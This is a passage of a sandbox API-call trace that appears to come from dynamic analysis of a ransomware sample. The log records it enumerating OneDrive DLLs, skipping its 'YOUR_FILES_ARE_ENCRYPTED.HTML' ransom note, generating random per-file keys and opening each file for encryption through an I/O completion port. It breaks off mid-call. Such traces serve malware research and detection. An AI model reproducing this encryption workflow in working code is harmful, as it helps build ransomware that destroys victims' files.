ftLastWriteTime.dwLowDateTime=0xa56d0c90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x48ab0, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSyncApi64.dll", cAlternateFileName="FILESY~1.DLL")) returned 1 [0159.818] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncApi64.dll") returned 95 [0159.818] lstrcmpW (lpString1="FileSyncApi64.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.818] PathFindExtensionW (pszPath="FileSyncApi64.dll") returned=".dll" [0159.819] lstrlenW (lpString=".dll") returned 4 [0159.819] PathFindExtensionW (pszPath="FileSyncApi64.dll") returned=".dll" [0159.819] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0159.819] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncApi64.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\filesyncapi64.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0159.820] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=297648) returned 1 [0159.820] GetProcessHeap () returned 0x270000 [0159.820] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0159.823] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="ED") returned 2 [0159.823] wsprintfW (in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="84") returned 2 [0159.823] wsprintfW (in: param_1=0x4ebce0e, param_2="%02X" | out: param_1="3D") returned 2 [0159.823] wsprintfW (in: param_1=0x4ebce12, param_2="%02X" | out: param_1="E4") returned 2 [0159.823] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="B5") returned 2 [0159.823] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="82") returned 2 [0159.823] wsprintfW (in: param_1=0x4ebce1e, param_2="%02X" | out: param_1="79") returned 2 [0159.823] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="FD") returned 2 [0159.823] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="7A") returned 2 [0159.823] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="2B") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce2e, param_2="%02X" | out: param_1="CF") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="67") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce36, param_2="%02X" | out: param_1="7C") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce3a, param_2="%02X" | out: param_1="CC") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="54") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="7D") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="D5") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce4a, param_2="%02X" | out: param_1="41") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="A2") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="36") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="DE") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="34") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: param_1="49") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="3B") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce66, param_2="%02X" | out: param_1="0B") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce6a, param_2="%02X" | out: param_1="15") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="BC") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce72, param_2="%02X" | out: param_1="E4") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="56") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: param_1="63") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="38") returned 2 [0159.824] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="34") returned 2 [0159.825] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncApi64.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncApi64.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncApi64.dll" [0159.825] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.825] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0159.825] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5873bb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5873bb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa590c130, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x576b0, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSyncShell64.dll", cAlternateFileName="FILESY~2.DLL")) returned 1 [0159.825] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncShell64.dll") returned 97 [0159.825] lstrcmpW (lpString1="FileSyncShell64.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.825] PathFindExtensionW (pszPath="FileSyncShell64.dll") returned=".dll" [0159.825] lstrlenW (lpString=".dll") returned 4 [0159.825] PathFindExtensionW (pszPath="FileSyncShell64.dll") returned=".dll" [0159.825] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0159.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\filesyncshell64.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0159.830] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=358064) returned 1 [0159.832] GetProcessHeap () returned 0x270000 [0159.832] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0159.854] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="A5") returned 2 [0159.854] wsprintfW (in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="08") returned 2 [0159.854] wsprintfW (in: param_1=0x4ebce0e, param_2="%02X" | out: param_1="F8") returned 2 [0159.854] wsprintfW (in: param_1=0x4ebce12, param_2="%02X" | out: param_1="E2") returned 2 [0159.854] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="E8") returned 2 [0159.854] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="8E") returned 2 [0159.854] wsprintfW (in: param_1=0x4ebce1e, param_2="%02X" | out: param_1="79") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="70") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="81") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="E3") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce2e, param_2="%02X" | out: param_1="DE") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="63") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce36, param_2="%02X" | out: param_1="02") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce3a, param_2="%02X" | out: param_1="FE") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="3D") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="C4") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="73") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce4a, param_2="%02X" | out: param_1="A5") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="4B") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="47") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="26") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="58") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: param_1="81") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="77") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce66, param_2="%02X" | out: param_1="90") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce6a, param_2="%02X" | out: param_1="87") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="D3") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce72, param_2="%02X" | out: param_1="E0") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="9B") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: param_1="D3") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="7F") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="4D") returned 2 [0159.856] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncShell64.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncShell64.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncShell64.dll" [0159.856] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.856] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0159.857] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5a3cc30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5a3cc30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5c780d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x20eb0, dwReserved0=0x0, dwReserved1=0x60, cFileName="LoggingPlatform64.dll", cAlternateFileName="LOGGIN~1.DLL")) returned 1 [0159.857] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\LoggingPlatform64.dll") returned 99 [0159.857] lstrcmpW (lpString1="LoggingPlatform64.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.857] PathFindExtensionW (pszPath="LoggingPlatform64.dll") returned=".dll" [0159.857] lstrlenW (lpString=".dll") returned 4 [0159.857] PathFindExtensionW (pszPath="LoggingPlatform64.dll") returned=".dll" [0159.857] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0159.858] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\LoggingPlatform64.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\loggingplatform64.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0159.860] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=134832) returned 1 [0159.860] GetProcessHeap () returned 0x270000 [0159.860] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0159.860] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="CC") returned 2 [0159.860] wsprintfW (in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="85") returned 2 [0159.860] wsprintfW (in: param_1=0x4ebce0e, param_2="%02X" | out: param_1="8F") returned 2 [0159.860] wsprintfW (in: param_1=0x4ebce12, param_2="%02X" | out: param_1="C8") returned 2 [0159.860] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="1B") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="36") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce1e, param_2="%02X" | out: param_1="3B") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="78") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="04") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="54") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce2e, param_2="%02X" | out: param_1="B0") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="94") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce36, param_2="%02X" | out: param_1="12") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce3a, param_2="%02X" | out: param_1="E2") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="56") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="A0") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="BC") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce4a, param_2="%02X" | out: param_1="64") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="5E") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="36") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="39") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="CF") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: param_1="04") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="CE") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce66, param_2="%02X" | out: param_1="17") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce6a, param_2="%02X" | out: param_1="58") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="C4") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce72, param_2="%02X" | out: param_1="BC") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="F7") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: param_1="0B") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="43") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="65") returned 2 [0159.862] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\LoggingPlatform64.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\LoggingPlatform64.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\LoggingPlatform64.dll" [0159.862] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.862] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0159.929] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5e1aff0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5e1aff0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5e1aff0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xa17c8, dwReserved0=0x0, dwReserved1=0x60, cFileName="msvcp110.dll", cAlternateFileName="")) returned 1 [0159.938] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcp110.dll") returned 90 [0159.939] lstrcmpW (lpString1="msvcp110.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.939] PathFindExtensionW (pszPath="msvcp110.dll") returned=".dll" [0159.939] lstrlenW (lpString=".dll") returned 4 [0159.939] PathFindExtensionW (pszPath="msvcp110.dll") returned=".dll" [0159.939] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0159.939] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcp110.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\msvcp110.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0159.940] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=661448) returned 1 [0159.940] GetProcessHeap () returned 0x270000 [0159.940] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0159.943] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="4D") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="58") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce0e, param_2="%02X" | out: param_1="1D") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce12, param_2="%02X" | out: param_1="E6") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="BD") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="AA") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce1e, param_2="%02X" | out: param_1="AA") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="A6") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="42") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="45") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce2e, param_2="%02X" | out: param_1="D4") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="AB") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce36, param_2="%02X" | out: param_1="DE") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce3a, param_2="%02X" | out: param_1="79") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="5E") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="30") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="2F") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce4a, param_2="%02X" | out: param_1="57") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="9F") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="86") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="8B") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="E0") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: param_1="D9") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="57") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce66, param_2="%02X" | out: param_1="95") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce6a, param_2="%02X" | out: param_1="A4") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="08") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce72, param_2="%02X" | out: param_1="2C") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="74") returned 2 [0159.945] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: param_1="74") returned 2 [0159.945] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="31") returned 2 [0159.945] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="73") returned 2 [0159.945] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcp110.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcp110.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcp110.dll" [0159.945] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.945] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0159.947] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa600a1d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa600a1d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa600a1d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xca5c8, dwReserved0=0x0, dwReserved1=0x60, cFileName="msvcr110.dll", cAlternateFileName="")) returned 1 [0159.950] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcr110.dll") returned 90 [0159.998] lstrcmpW (lpString1="msvcr110.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.998] PathFindExtensionW (pszPath="msvcr110.dll") returned=".dll" [0159.998] lstrlenW (lpString=".dll") returned 4 [0159.998] PathFindExtensionW (pszPath="msvcr110.dll") returned=".dll" [0159.998] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0159.998] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcr110.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\msvcr110.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0159.999] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=828872) returned 1 [0159.999] GetProcessHeap () returned 0x270000 [0159.999] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0160.000] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="35") returned 2 [0160.000] wsprintfW (in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="52") returned 2 [0160.000] wsprintfW (in: param_1=0x4ebce0e, param_2="%02X" | out: param_1="5D") returned 2 [0160.000] wsprintfW (in: param_1=0x4ebce12, param_2="%02X" | out: param_1="AF") returned 2 [0160.000] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="1F") returned 2 [0160.000] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="3F") returned 2 [0160.000] wsprintfW (in: param_1=0x4ebce1e, param_2="%02X" | out: param_1="AB") returned 2 [0160.000] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="CB") returned 2 [0160.000] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="B4") returned 2 [0160.000] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="C8") returned 2 [0160.000] wsprintfW (in: param_1=0x4ebce2e, param_2="%02X" | out: param_1="02") returned 2 [0160.000] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="1C") returned 2 [0160.000] wsprintfW (in: param_1=0x4ebce36, param_2="%02X" | out: param_1="D5") returned 2 [0160.000] wsprintfW (in: param_1=0x4ebce3a, param_2="%02X" | out: param_1="9C") returned 2 [0160.000] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="D3") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="DC") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="56") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce4a, param_2="%02X" | out: param_1="BA") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="FF") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="BA") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="C7") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="BA") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: param_1="B9") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="EC") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce66, param_2="%02X" | out: param_1="76") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce6a, param_2="%02X" | out: param_1="D9") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="30") returned 2 [0160.001] wsprintfW (in: 